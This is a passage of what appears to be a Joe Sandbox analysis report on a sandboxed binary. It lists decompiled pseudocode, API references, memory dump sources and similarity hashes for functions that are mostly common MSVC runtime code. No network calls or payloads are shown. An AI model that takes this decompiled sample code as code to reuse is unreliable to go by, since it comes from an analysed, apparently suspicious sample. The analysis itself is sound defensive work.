					E00CA77A4( *((intOrPtr*)( *_t48 + 4)) + _t48,  ==  ?  *( *((intOrPtr*)( *_t48 + 4)) + _t48 + 0xc) | 6 :  *( *((intOrPtr*)( *_t48 + 4)) + _t48 + 0xc) | 0x00000002, 0);
				}
				0xe2149e();
				return _t48;
			}

0x00ca3b5e
0x00ca3b63
0x00ca3b65
0x00ca3b6a
0x00ca3b6d
0x00ca3b70
0x00ca3b72
0x00ca3b78
0x00ca3b7f
0x00ca3b82
0x00ca3b82
0x00ca3b89
0x00ca3b8a
0x00ca3b90
0x00ca3b91
0x00ca3b99
0x00ca3ba3
0x00ca3baf
0x00ca3bb2
0x00ca3bb8
0x00ca3bbd
0x00ca3bc8
0x00ca3bcc
0x00ca3bcd
0x00ca3bd0
0x00ca3bd7
0x00ca3bef
0x00ca3bf3
0x00ca3bf3
0x00ca3bfa
0x00ca3bff

APIs

__EH_prolog3.LIBCMT ref: 00CA3B5E
std::ios_base::clear.LIBCPMT ref: 00CA3BF3

Strings

,,, xrefs: 00CA3B78

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: H_prolog3std::ios_base::clear
String ID: ,,
API String ID: 973902081-1556401989
Opcode ID: 917935325396bb52e7776141b7cf79c193b7be0e056de554308b27859adb3c3c
Instruction ID: 84ac8463723ab0f2be04def77c8e08be46e5b25b77d0de66c941cc8cf878aa0d
Opcode Fuzzy Hash: 917935325396bb52e7776141b7cf79c193b7be0e056de554308b27859adb3c3c
Instruction Fuzzy Hash: 63116AB060024AAFDB00DF68C9869AEBBE5FF85308B20905DF819AB302D771DE11DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00E68F3E Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00E68FA6
Concurrency::details::_NonReentrantLock::_Acquire.LIBCMT ref: 00E68FB3

Part of subcall function 00E684FA: _SpinWait.LIBCMT ref: 00E6851A

Concurrency::details::ResourceManager::ResourceManager.LIBCMT ref: 00E69006

Part of subcall function 00D0BC90: _malloc.LIBCMT ref: 00D0BCAC

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Resource$AcquireConcurrency::details::Concurrency::details::_H_prolog3Lock::_ManagerManager::ReentrantSpinWait_malloc
String ID:
API String ID: 4174107958-0
Opcode ID: a7ffe2dce22f5d7bbf5bdefe75bbb8e78e428dc1b31b8485cf71dc6a52ce5dc2
Instruction ID: d012f4055287ed5274ef482875bac6aeaf2d31e2513f7365583808a3b6e97abf
Opcode Fuzzy Hash: a7ffe2dce22f5d7bbf5bdefe75bbb8e78e428dc1b31b8485cf71dc6a52ce5dc2
Instruction Fuzzy Hash: CC01B530A492559BEB64FFB87A1539CB7E4AF28380F2010ADF009F7282DE754E009765

Uniqueness

Uniqueness Score: -1.00%

Function 00E24AE2 Relevance: 4.5, APIs: 3, Instructions: 20fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,00CA84B1,00E93C14,00E92A88,00000028), ref: 00E24AE8
GetLastError.KERNEL32(?,00CA84B1,00E93C14,00E92A88,00000028), ref: 00E24AF2
__dosmaperr.LIBCMT ref: 00E24B01

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: DeleteErrorFileLast__dosmaperr
String ID:
API String ID: 1545401867-0
Opcode ID: b3a1e1683a4f8a71ca7580424ba61d50f0cb99708403b3454965fc4e22587a53
Instruction ID: 99a9cf9e79a28c9445fbd38e93be6e0722c8adfdd80dbbb13c63e8c4c67e64de
Opcode Fuzzy Hash: b3a1e1683a4f8a71ca7580424ba61d50f0cb99708403b3454965fc4e22587a53
Instruction Fuzzy Hash: 67D0A7B12442196E8B212BF7FC049573BAC9B003753003621F42DE02F1FF62CC448150

Uniqueness

Uniqueness Score: -1.00%

Function 00CA3AEB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00CA3AEB(intOrPtr* __ecx) {
				intOrPtr* _t31;
				void* _t32;

				0xe214d0(8);
				_t31 = __ecx;
				 *((intOrPtr*)(_t32 - 0x14)) = __ecx;
				 *((intOrPtr*)(_t32 - 0x10)) = 0;
				if( *((intOrPtr*)(_t32 + 0x10)) != 0) {
					 *__ecx = 0xe92c38;
					 *((intOrPtr*)(__ecx + 0x18)) = 0xe92c2c;
					 *((intOrPtr*)(_t32 - 4)) = 0;
					 *((intOrPtr*)(_t32 - 0x10)) = 1;
				}
				 *((intOrPtr*)(_t31 +  *((intOrPtr*)( *_t31 + 4)))) = 0xe92c34;
				 *((intOrPtr*)( *((intOrPtr*)( *_t31 + 4)) + _t31 - 4)) =  *((intOrPtr*)( *_t31 + 4)) - 0x18;
				 *((intOrPtr*)(_t31 + 8)) = 0;
				 *((intOrPtr*)(_t31 + 0xc)) = 0;
				E00CA98C0( *((intOrPtr*)( *_t31 + 4)) + _t31,  *((intOrPtr*)( *_t31 + 4)) + _t31,  *((intOrPtr*)(_t32 + 8)),  *((intOrPtr*)(_t32 + 0xc))); // executed
				0xe2149e();
				return _t31;
			}

0x00ca3af2
0x00ca3af7
0x00ca3af9
0x00ca3afe
0x00ca3b04
0x00ca3b06
0x00ca3b0c
0x00ca3b13
0x00ca3b16
0x00ca3b16
0x00ca3b28
0x00ca3b37
0x00ca3b3d
0x00ca3b40
0x00ca3b48
0x00ca3b4f
0x00ca3b54

APIs

__EH_prolog3.LIBCMT ref: 00CA3AF2

Strings

,,, xrefs: 00CA3B0C

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: H_prolog3
String ID: ,,
API String ID: 431132790-1556401989
Opcode ID: 0939da464afea9685f1c9e5a650963c9914a901a64e4ccd7d48f62ebb716e3c2
Instruction ID: ab3ba55ef3ba5d1305bc0dba24b9585e5c35694ea8519b70f818c826c943026a
Opcode Fuzzy Hash: 0939da464afea9685f1c9e5a650963c9914a901a64e4ccd7d48f62ebb716e3c2
Instruction Fuzzy Hash: 0C01E474A006199FCF29DF19C54195EFBF0BF98304B10C85DE598AB311D771AA41DF80

Uniqueness

Uniqueness Score: -1.00%

Function 00CA5071 Relevance: 3.1, APIs: 2, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00CA5071(intOrPtr* __ecx, void* __eflags) {
				intOrPtr _t37;
				intOrPtr _t42;
				intOrPtr _t47;
				signed short _t48;
				signed short _t53;
				signed int _t58;
				signed int _t60;
				signed int _t63;
				intOrPtr _t64;
				intOrPtr* _t70;
				signed int _t71;
				signed int _t72;
				void* _t73;

				0xe21539(0x1c);
				_t70 = __ecx;
				 *((intOrPtr*)(_t73 - 0x18)) = __ecx;
				_push(__ecx);
				 *(_t73 - 0x1c) = 0;
				 *((char*)(_t73 - 0x11)) = 0;
				E00CA484F(_t73 - 0x28);
				 *((intOrPtr*)(_t73 - 4)) = 0;
				if( *((intOrPtr*)(_t73 - 0x24)) == 0) {
					_t58 = 0;
					goto L12;
				} else {
					_t47 =  *((intOrPtr*)(_t73 + 8));
					if(_t47 == 0) {
						L10:
						_t58 =  *(_t73 - 0x1c);
						L12:
						_t71 = 4;
					} else {
						_t63 = 0xffff;
						_t72 = 0xffff;
						while(1) {
							 *((char*)(_t73 - 4)) = 1;
							_t64 = _t47;
							if(_t63 != _t72) {
								_t48 = E00CAACB0(_t64);
							} else {
								_t48 = E00CAAC8D(_t64);
							}
							_t72 = _t48 & 0x0000ffff;
							 *((intOrPtr*)(_t73 - 4)) = 0;
							 *(_t73 - 0x20) = _t72;
							if(0xffff == _t72) {
								goto L10;
							}
							 *((char*)(_t73 - 4)) = 3;
							_t53 = E00CAAD38( *((intOrPtr*)( *((intOrPtr*)( *_t70 + 4)) + _t70 + 0x38)), _t72); // executed
							_t63 = 0xffff;
							if(0xffff != (_t53 & 0x0000ffff)) {
								_t47 =  *((intOrPtr*)(_t73 + 8));
								 *((intOrPtr*)(_t73 - 4)) = 0;
								 *((char*)(_t73 - 0x11)) = 1;
								continue;
							} else {
								_t71 = 4;
								_t58 =  *(_t73 - 0x1c) | _t71;
								 *((char*)(_t73 - 4)) = 0;
							}
							goto L13;
						}
						goto L10;
					}
				}
				L13:
				_t37 =  *((intOrPtr*)( *_t70 + 4));
				 *((intOrPtr*)(_t37 + _t70 + 0x20)) = 0;
				 *((intOrPtr*)(_t37 + _t70 + 0x24)) = 0;
				_t59 =  ==  ? _t58 | 0x00000002 : _t58;
				_t60 =  ==  ? _t71 :  ==  ? _t58 | 0x00000002 : _t58;
				_t42 =  *((intOrPtr*)( *_t70 + 4)) + _t70;
				 *((intOrPtr*)(_t73 + 8)) = _t42;
				if(_t60 != 0) {
					_t69 =  ==  ?  *(_t42 + 0xc) | _t60 | _t71 :  *(_t42 + 0xc) | _t60;
					_t42 = E00CA77A4( *((intOrPtr*)(_t73 + 8)),  ==  ?  *(_t42 + 0xc) | _t60 | _t71 :  *(_t42 + 0xc) | _t60, 0);
				}
				E00CA4F71(_t42, _t73 - 0x28);
				0xe2149e();
				return _t70;
			}

0x00ca5078
0x00ca507d
0x00ca507f
0x00ca5087
0x00ca5088
0x00ca508b
0x00ca508e
0x00ca5093
0x00ca5099
0x00ca5190
0x00000000
0x00ca509f
0x00ca509f
0x00ca50a4
0x00ca518b
0x00ca518b
0x00ca5192
0x00ca5194
0x00ca50aa
0x00ca50aa
0x00ca50af
0x00ca50b1
0x00ca50b4
0x00ca50b8
0x00ca50ba
0x00ca50c3
0x00ca50bc
0x00ca50bc
0x00ca50bc
0x00ca50cb
0x00ca50cd
0x00ca50d5
0x00ca50db
0x00000000
0x00000000
0x00ca50e4
0x00ca50ef
0x00ca50f7
0x00ca50ff
0x00ca514d
0x00ca5150
0x00ca5153
0x00000000
0x00ca5101
0x00ca5106
0x00ca5107
0x00ca5109
0x00ca5109
0x00000000
0x00ca50ff
0x00000000
0x00ca50b1
0x00ca50a4
0x00ca5195
0x00ca5197
0x00ca519a
0x00ca519e
0x00ca51ab
0x00ca51b4
0x00ca51ba
0x00ca51bc
0x00ca51c1
0x00ca51d3
0x00ca51d7
0x00ca51d7
0x00ca51df
0x00ca51e6
0x00ca51eb

APIs

__EH_prolog3_catch.LIBCMT ref: 00CA5078

Part of subcall function 00CA484F: __EH_prolog3.LIBCMT ref: 00CA4856

std::ios_base::clear.LIBCPMT ref: 00CA51D7

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: H_prolog3H_prolog3_catchstd::ios_base::clear
String ID:
API String ID: 1834360608-0
Opcode ID: b9feb3736693950258ed1f28d85fd7d818b4076aaf05260ec87aa7b457b55887
Instruction ID: 7636994e2e4f53d41b78cb1f4be946469bc312665c172dc6894b5b2de4c25bbf
Opcode Fuzzy Hash: b9feb3736693950258ed1f28d85fd7d818b4076aaf05260ec87aa7b457b55887
Instruction Fuzzy Hash: B031A170A04146DFDB14DFA8C491ABDBBE0AF56308F54806EE546DB241CB74CE45D790

Uniqueness

Uniqueness Score: -1.00%

Function 00E24D19 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E29047: __getptd_noexit.LIBCMT ref: 00E29047

__lock_file.LIBCMT ref: 00E24D5E

Part of subcall function 00E26007: __lock.LIBCMT ref: 00E2602A

__fclose_nolock.LIBCMT ref: 00E24D69

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: ec041dcf9bc0a862fb49d8cbdb322a5302e911b83f07dcece4a021326f1c5ca3
Instruction ID: bba1ef10d0832b6f7902f386da7397c97afcbcabb003d960f30944ae4501643d
Opcode Fuzzy Hash: ec041dcf9bc0a862fb49d8cbdb322a5302e911b83f07dcece4a021326f1c5ca3
Instruction Fuzzy Hash: 93F0BBB1801724DADB117B75A802B6D77D06F41334F15B244E424BB1D2CF7C99029B51

Uniqueness

Uniqueness Score: -1.00%

Function 00E6D42E Relevance: 3.0, APIs: 2, Instructions: 16threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E71C59: std::bad_exception::bad_exception.LIBCMT ref: 00E71C90
Part of subcall function 00E71C59: __CxxThrowException@8.LIBCMT ref: 00E71C9E

Concurrency::details::SchedulerBase::CheckStaticConstruction.LIBCMT ref: 00E6D439

Part of subcall function 00E6D159: __EH_prolog3.LIBCMT ref: 00E6D160
Part of subcall function 00E6D159: Concurrency::details::_NonReentrantLock::_Acquire.LIBCMT ref: 00E6D16D

Concurrency::details::ThreadScheduler::Create.LIBCMT ref: 00E6D441

Part of subcall function 00E783B7: __EH_prolog3.LIBCMT ref: 00E783BE
Part of subcall function 00E783B7: Concurrency::details::ThreadScheduler::ThreadScheduler.LIBCMT ref: 00E783DF

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Concurrency::details::Thread$H_prolog3SchedulerScheduler::$AcquireBase::CheckConcurrency::details::_ConstructionCreateException@8Lock::_ReentrantStaticThrowstd::bad_exception::bad_exception
String ID:
API String ID: 3422515427-0
Opcode ID: dfe32384f9c00a5c2d26e5e4fec08fe1b23162d87cf6d89f407b317d9ae857ca
Instruction ID: d67b6805dddca421bde49f556b2a4b06a855074e8fd908476ba5de192b8cec75
Opcode Fuzzy Hash: dfe32384f9c00a5c2d26e5e4fec08fe1b23162d87cf6d89f407b317d9ae857ca
Instruction Fuzzy Hash: 40C012766D420D168F047AA9FC1262937CC8A5079874850A1F80CA5653DE25EC50D091

Uniqueness

Uniqueness Score: -1.00%

Function 00D32364 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00D32364(intOrPtr* __ecx) {
				intOrPtr _t84;
				void* _t93;
				struct tagLOGFONTW _t95;

				0xe214d0(4);
				 *((intOrPtr*)(_t93 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx + 0x9c)) = 0;
				 *((intOrPtr*)(__ecx + 0x98)) = 0xea00e4;
				 *((intOrPtr*)(_t93 - 4)) = 0;
				 *((intOrPtr*)(__ecx + 0xa4)) = 0;
				 *((intOrPtr*)(__ecx + 0xa0)) = 0xea00e4;
				 *((intOrPtr*)(__ecx + 0xac)) = 0;
				 *((intOrPtr*)(__ecx + 0xa8)) = 0xea00e4;
				 *((intOrPtr*)(__ecx + 0xb4)) = 0;
				 *((intOrPtr*)(__ecx + 0xb0)) = 0xea00e4;
				 *((intOrPtr*)(__ecx + 0xbc)) = 0;
				 *((intOrPtr*)(__ecx + 0xb8)) = 0xea00e4;
				 *((intOrPtr*)(__ecx + 0xc4)) = 0;
				 *((intOrPtr*)(__ecx + 0xc0)) = 0xea00e4;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				 *((intOrPtr*)(__ecx + 0xc8)) = 0xea00e4;
				 *((intOrPtr*)(__ecx + 0xd4)) = 0;
				 *((intOrPtr*)(__ecx + 0xd0)) = 0xea00e4;
				 *((intOrPtr*)(__ecx + 0xdc)) = 0;
				 *((intOrPtr*)(__ecx + 0xd8)) = 0xea00d4;
				 *((intOrPtr*)(__ecx + 0xe4)) = 0;
				 *((intOrPtr*)(__ecx + 0xe0)) = 0xea00d4;
				 *((intOrPtr*)(__ecx + 0xec)) = 0;
				 *((intOrPtr*)(__ecx + 0xe8)) = 0xea00d4;
				 *((intOrPtr*)(__ecx + 0x114)) = 0;
				 *((intOrPtr*)(__ecx + 0x118)) = 0;
				 *((intOrPtr*)(__ecx + 0x120)) = 0;
				 *((intOrPtr*)(__ecx + 0x11c)) = 0xea0394;
				 *((intOrPtr*)(__ecx + 0x128)) = 0;
				 *((intOrPtr*)(__ecx + 0x124)) = 0xea0394;
				 *((intOrPtr*)(__ecx + 0x130)) = 0;
				 *((intOrPtr*)(__ecx + 0x12c)) = 0xea0394;
				 *((intOrPtr*)(__ecx + 0x138)) = 0;
				 *((intOrPtr*)(__ecx + 0x134)) = 0xea0394;
				 *((intOrPtr*)(__ecx + 0x140)) = 0;
				 *((intOrPtr*)(__ecx + 0x13c)) = 0xea0394;
				 *((intOrPtr*)(__ecx + 0x148)) = 0;
				 *((intOrPtr*)(__ecx + 0x144)) = 0xea0394;
				 *((intOrPtr*)(__ecx + 0x150)) = 0;
				 *((intOrPtr*)(__ecx + 0x14c)) = 0xea0394;
				 *((intOrPtr*)(__ecx + 0x158)) = 0;
				 *((intOrPtr*)(__ecx + 0x154)) = 0xea0394;
				 *((intOrPtr*)(__ecx + 0x160)) = 0;
				 *((intOrPtr*)(__ecx + 0x15c)) = 0xea0394;
				 *((intOrPtr*)(__ecx + 0x168)) = 0;
				 *((intOrPtr*)(__ecx + 0x164)) = 0xea0394;
				 *((intOrPtr*)(__ecx + 0x16c)) = 0;
				 *((intOrPtr*)(__ecx + 0x170)) = 0;
				 *((intOrPtr*)(__ecx + 0x174)) = 0;
				 *((intOrPtr*)(__ecx + 0x178)) = 0;
				 *((char*)(_t93 - 4)) = 0x14;
				 *__ecx = 0;
				 *((intOrPtr*)(__ecx + 0x1e4)) = 1;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *(__ecx + 0x1c4) =  *(__ecx + 0x1c4) | 0xffffffff;
				_t84 = 4;
				 *((intOrPtr*)(__ecx + 0x18c)) = 1;
				 *((intOrPtr*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0xf0)) = 0;
				 *((intOrPtr*)(__ecx + 0xf4)) = 0;
				 *((intOrPtr*)(__ecx + 0xf8)) = 0;
				 *((intOrPtr*)(__ecx + 0xfc)) = 0;
				 *((intOrPtr*)(__ecx + 0x108)) = 0;
				 *((intOrPtr*)(__ecx + 0x10c)) = 0;
				 *((intOrPtr*)(__ecx + 0x110)) = 0;
				 *((intOrPtr*)(__ecx + 0x100)) = 0;
				 *((intOrPtr*)(__ecx + 0x104)) = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((intOrPtr*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				 *((intOrPtr*)(__ecx + 0x198)) = 0;
				 *((intOrPtr*)(__ecx + 0x1e8)) = 0;
				 *((intOrPtr*)(__ecx + 0x1b0)) = 0xea0394;
				 *((intOrPtr*)(__ecx + 0x1b4)) = 3;
				 *((intOrPtr*)(__ecx + 0x1b8)) = 0xe;
				 *((intOrPtr*)(__ecx + 0x1bc)) = _t84;
				 *((intOrPtr*)(__ecx + 0x1c0)) = 0x32;
				 *((intOrPtr*)(__ecx + 0x184)) = 0;
				 *((intOrPtr*)(__ecx + 0x188)) = 0;
				E00D3302F(__ecx, 0, _t95); // executed
				0xe2149e();
				return __ecx;
			}

0x00d3236b
0x00d32372
0x00d3237c
0x00d32382
0x00d32388
0x00d3238b
0x00d32391
0x00d32397
0x00d3239d
0x00d323a3
0x00d323a9
0x00d323af
0x00d323b5
0x00d323bb
0x00d323c1
0x00d323c7
0x00d323cd
0x00d323d3
0x00d323d9
0x00d323e4
0x00d323ea
0x00d323f0
0x00d323f6
0x00d323fc
0x00d32402
0x00d32408
0x00d32413
0x00d32419
0x00d3241f
0x00d32425
0x00d3242b
0x00d32431
0x00d32437
0x00d3243d
0x00d32443
0x00d32449
0x00d3244f
0x00d32455
0x00d3245b
0x00d32461
0x00d32467
0x00d3246d
0x00d32473
0x00d32479
0x00d3247f
0x00d32485
0x00d3248b
0x00d32491
0x00d32499
0x00d324a0
0x00d324a6
0x00d324ac
0x00d324b0
0x00d324b2
0x00d324b8
0x00d324bb
0x00d324be
0x00d324c7
0x00d324c8
0x00d324d0
0x00d324d3
0x00d324d9
0x00d324df
0x00d324e5
0x00d324eb
0x00d324f1
0x00d324f7
0x00d324fd
0x00d32503
0x00d32509
0x00d3250c
0x00d3250f
0x00d32512
0x00d32518
0x00d3251e
0x00d32524
0x00d3252e
0x00d32538
0x00d3253e
0x00d32548
0x00d3254e
0x00d32554
0x00d3255b
0x00d32560

APIs

__EH_prolog3.LIBCMT ref: 00D3236B

Part of subcall function 00D3302F: _memset.LIBCMT ref: 00D3307B
Part of subcall function 00D3302F: VerSetConditionMask.NTDLL(00000000,00000000,00000002,00000003), ref: 00D33092
Part of subcall function 00D3302F: VerSetConditionMask.NTDLL(00000000), ref: 00D33096
Part of subcall function 00D3302F: VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 00D330A3
Part of subcall function 00D3302F: GetSystemMetrics.USER32(00001000), ref: 00D330B4

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: ConditionMask$H_prolog3InfoMetricsSystemVerifyVersion_memset
String ID:
API String ID: 361283447-0
Opcode ID: 4e4cbbf0422ab8aa7aa8db4e9b0f67d4cd0b6196db22dce4bcae607e8eb647a1
Instruction ID: 38139cad7f6a191d52d33508371fe5bebf199c1470504c045546fa7cd8e101b4
Opcode Fuzzy Hash: 4e4cbbf0422ab8aa7aa8db4e9b0f67d4cd0b6196db22dce4bcae607e8eb647a1
Instruction Fuzzy Hash: 0F51CDB0906F45CFD7A9CF3A85417C6FAE0BF89300F108A2E91AED6261EB716184CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00E496ED Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

_fseek.LIBCMT ref: 00E496D8

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: _fseek
String ID:
API String ID: 2937370855-0
Opcode ID: d1e949a221028f700b3979824ed96e08666e972ba020061d9a72039819c95cd8
Instruction ID: b02043c3559da8e8f67f682523bce3c06f1593dbd8707abb41c957fc78569da8
Opcode Fuzzy Hash: d1e949a221028f700b3979824ed96e08666e972ba020061d9a72039819c95cd8
Instruction Fuzzy Hash: CC11293261122627CF240969BC01BBB77C69F91798F2B20B4FC46B6157E721CC118294

Uniqueness

Uniqueness Score: -1.00%

Function 00CA5140 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00CA5140() {
				intOrPtr _t29;
				signed short _t30;
				intOrPtr _t34;
				intOrPtr _t39;
				signed short _t46;
				void* _t49;
				intOrPtr _t50;
				signed int _t51;
				signed int _t53;
				intOrPtr* _t61;
